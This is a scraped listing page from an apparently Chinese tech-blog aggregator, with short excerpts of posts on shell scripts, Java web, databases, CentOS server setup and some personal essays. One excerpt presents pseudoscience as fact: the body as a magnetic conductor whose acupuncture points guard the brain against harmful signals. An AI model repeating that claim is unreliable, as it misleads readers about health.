    对于一些未提供service管理的程序  每次启动和关闭都要加上全部路径,想到可以做一个简单的启动和关闭控制的文件   下面以scrapy启动server为例,文件名为run.sh:   #端口号,根据此端口号确定PID PORT=6800 #启动命令所在目录 HOME='/home/jmscra/scrapy/' #查询出监听了PORT端口
  • 人--自私与无私 永夜-极光
                今天上毛概课,老师提出一个问题--人是自私的还是无私的,根源是什么?               从客观的角度来看,人有自私的行为,也有无私的
  • Ubuntu安装NS-3 环境脚本 随便小屋 ubuntu
      将附件下载下来之后解压,将解压后的文件ns3environment.sh复制到下载目录下(其实放在哪里都可以,就是为了和我下面的命令相统一)。输入命令:   sudo ./ns3environment.sh >>result   这样系统就自动安装ns3的环境,运行的结果在result文件中,如果提示     com
  • 创业的简单感受 aijuans 创业的简单感受
           2009年11月9日我进入a公司实习,2012年4月26日,我离开a公司,开始自己的创业之旅。      今天是2012年5月30日,我忽然很想谈谈自己创业一个月的感受。 当初离开边锋时,我就对自己说:“自己选择的路,就是跪着也要把他走完”,我也做好了心理准备,准备迎接一次次的困难。我这次走出来,不管成败
  • 如何经营自己的独立人脉 aoyouzi 如何经营自己的独立人脉
    独立人脉不是父母、亲戚的人脉,而是自己主动投入构造的人脉圈。“放长线,钓大鱼”,先行投入才能产生后续产出。   现在几乎做所有的事情都需要人脉。以银行柜员为例,需要拉储户,而其本质就是社会人脉,就是社交!很多人都说,人脉我不行,因为我爸不行、我妈不行、我姨不行、我舅不行……我谁谁谁都不行,怎么能建立人脉?我这里说的人脉,是你的独立人脉。   以一个普通的银行柜员
  • JSP基础 百合不是茶 jsp注释隐式对象
      1,JSP语句的声明 <%! 声明 %>    声明:这个就是提供java代码声明变量、方法等的场所。 表达式 <%= 表达式 %>    这个相当于赋值,可以在页面上显示表达式的结果, 程序代码段/小型指令 <% 程序代码片段 %>   2,JSP的注释   <!-- -->
  • web.xml之session-config、mime-mapping bijian1013 javaweb.xmlservletsession-configmime-mapping
    session-config 1.定义: <session-config> <session-timeout>20</session-timeout> </session-config> 2.作用:用于定义整个WEB站点session的有效期限,单位是分钟。   mime-mapping 1.定义: <mime-m
  • 互联网开放平台(1) Bill_chen 互联网qq新浪微博百度腾讯
    现在各互联网公司都推出了自己的开放平台供用户创造自己的应用,互联网的开放技术欣欣向荣,自己总结如下: 1.淘宝开放平台(TOP) 网址:http://open.taobao.com/ 依赖淘宝强大的电子商务数据,将淘宝内部业务数据作为API开放出去,同时将外部ISV的应用引入进来。 目前TOP的三条主线: TOP访问网站:open.taobao.com ISV后台:my.open.ta
  • 【MongoDB学习笔记九】MongoDB索引 bit1129 mongodb
    索引 可以在任意列上建立索引 索引的构造和使用与传统关系型数据库几乎一样,适用于Oracle的索引优化技巧也适用于Mongodb 使用索引可以加快查询,但同时会降低修改,插入等的性能 内嵌文档照样可以建立使用索引 测试数据     var p1 = { "name":"Jack", "age&q
  • JDBC常用API之外的总结 白糖_ jdbc
    做JAVA的人玩JDBC肯定已经很熟练了,像DriverManager、Connection、ResultSet、Statement这些基本类大家肯定很常用啦,我不赘述那些诸如注册JDBC驱动、创建连接、获取数据集的API了,在这我介绍一些写框架时常用的API,大家共同学习吧。     ResultSetMetaData获取ResultSet对象的元数据信息
  • apache VelocityEngine使用记录 bozch VelocityEngine
    VelocityEngine是一个模板引擎,能够基于模板生成指定的文件代码。   使用方法如下:     VelocityEngine engine = new VelocityEngine();// 定义模板引擎     Properties properties = new Properties();// 模板引擎属
  • 编程之美-快速找出故障机器 bylijinnan 编程之美
    package beautyOfCoding; import java.util.Arrays; public class TheLostID { /*编程之美 假设一个机器仅存储一个标号为ID的记录,假设机器总量在10亿以下且ID是小于10亿的整数,假设每份数据保存两个备份,这样就有两个机器存储了同样的数据。 1.假设在某个时间得到一个数据文件ID的列表,是
  • 关于Java中redirect与forward的区别 chenbowen00 javaservlet
    在Servlet中两种实现: forward方式:request.getRequestDispatcher(“/somePage.jsp”).forward(request, response); redirect方式:response.sendRedirect(“/somePage.jsp”); forward是服务器内部重定向,程序收到请求后重新定向到另一个程序,客户机并不知
  • [信号与系统]人体最关键的两个信号节点 comsci 系统
            如果把人体看做是一个带生物磁场的导体,那么这个导体有两个很重要的节点,第一个在头部,中医的名称叫做 百汇穴, 另外一个节点在腰部,中医的名称叫做 命门         如果要保护自己的脑部磁场不受到外界有害信号的攻击,最简单的
  • oracle 存储过程执行权限 daizj oracle存储过程权限执行者调用者
    在数据库系统中存储过程是必不可少的利器,存储过程是预先编译好的为实现一个复杂功能的一段Sql语句集合。它的优点我就不多说了,说一下我碰到的问题吧。我在项目开发的过程中需要用存储过程来实现一个功能,其中涉及到判断一张表是否已经建立,没有建立就由存储过程来建立这张表。 CREATE OR REPLACE PROCEDURE TestProc  IS    fla
  • 为mysql数据库建立索引 dengkane mysql性能索引
    前些时候,一位颇高级的程序员居然问我什么叫做索引,令我感到十分的惊奇,我想这绝不会是沧海一粟,因为有成千上万的开发者(可能大部分是使用MySQL的)都没有受过有关数据库的正规培训,尽管他们都为客户做过一些开发,但却对如何为数据库建立适当的索引所知较少,因此我起了写一篇相关文章的念头。  最普通的情况,是为出现在where子句的字段建一个索引。为方便讲述,我们先建立一个如下的表。
  • 学习C语言常见误区 如何看懂一个程序 如何掌握一个程序以及几个小题目示例 dcj3sjt126com c算法
    如果看懂一个程序,分三步   1、流程   2、每个语句的功能   3、试数   如何学习一些小算法的程序 尝试自己去编程解决它,大部分人都自己无法解决 如果解决不了就看答案 关键是把答案看懂,这个是要花很大的精力,也是我们学习的重点 看懂之后尝试自己去修改程序,并且知道修改之后程序的不同输出结果的含义 照着答案去敲 调试错误
  • centos6.3安装php5.4报错 dcj3sjt126com centos6
    报错内容如下: Resolving Dependencies --> Running transaction check ---> Package php54w.x86_64 0:5.4.38-1.w6 will be installed --> Processing Dependency: php54w-common(x86-64) = 5.4.38-1.w6 for
  • JSONP请求 flyer0126 jsonp
          使用jsonp不能发起POST请求。 It is not possible to make a JSONP POST request. JSONP works by creating a <script> tag that executes Javascript from a different domain; it is not pos
  • Spring Security(03)——核心类简介 234390216 Authentication
    核心类简介 目录 1.1     Authentication 1.2     SecurityContextHolder 1.3     AuthenticationManager和AuthenticationProvider 1.3.1  &nb
  • 在CentOS上部署JAVA服务 java--hhf javajdkcentosJava服务
        本文将介绍如何在CentOS上运行Java Web服务,其中将包括如何搭建JAVA运行环境、如何开启端口号、如何使得服务在命令执行窗口关闭后依旧运行     第一步:卸载旧Linux自带的JDK ①查看本机JDK版本 java -version    结果如下 java version "1.6.0"
  • oracle、sqlserver、mysql常用函数对比[to_char、to_number、to_date] ldzyz007 oraclemysqlSQL Server
    oracle                                &n
  • 记Protocol Oriented Programming in Swift of WWDC 2015 ningandjin protocolWWDC 2015Swift2.0
    其实最先朋友让我就这个题目写篇文章的时候,我是拒绝的,因为觉得苹果就是在炒冷饭, 把已经流行了数十年的OOP中的“面向接口编程”还拿来讲,看完整个Session之后呢,虽然还是觉得在炒冷饭,但是毕竟还是加了蛋的,有些东西还是值得说说的。 通常谈到面向接口编程,其主要作用是把系统设计和具体实现分离开,让系统的每个部分都可以在不影响别的部分的情况下,改变自身的具体实现。接口的设计就反映了系统
  • 搭建 CentOS 6 服务器(15) - Keepalived、HAProxy、LVS rensanning keepalived
    (一)Keepalived (1)安装 # cd /usr/local/src # wget http://www.keepalived.org/software/keepalived-1.2.15.tar.gz # tar zxvf keepalived-1.2.15.tar.gz # cd keepalived-1.2.15 # ./configure # make &a
  • ORACLE数据库SCN和时间的互相转换 tomcat_oracle oraclesql
    SCN(System Change Number 简称 SCN)是当Oracle数据库更新后,由DBMS自动维护去累积递增的一个数字,可以理解成ORACLE数据库的时间戳,从ORACLE 10G开始,提供了函数可以实现SCN和时间进行相互转换;    用途:在进行数据库的还原和利用数据库的闪回功能时,进行SCN和时间的转换就变的非常必要了;    操作方法:   1、通过dbms_f
  • Spring MVC 方法注解拦截器 xp9802 spring mvc
    应用场景,在方法级别对本次调用进行鉴权,如api接口中有个用户唯一标示accessToken,对于有accessToken的每次请求可以在方法加一个拦截器,获得本次请求的用户,存放到request或者session域。 python中,之前在python flask中可以使用装饰器来对方法进行预处理,进行权限处理 先看一个实例,使用@access_required拦截: ?
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他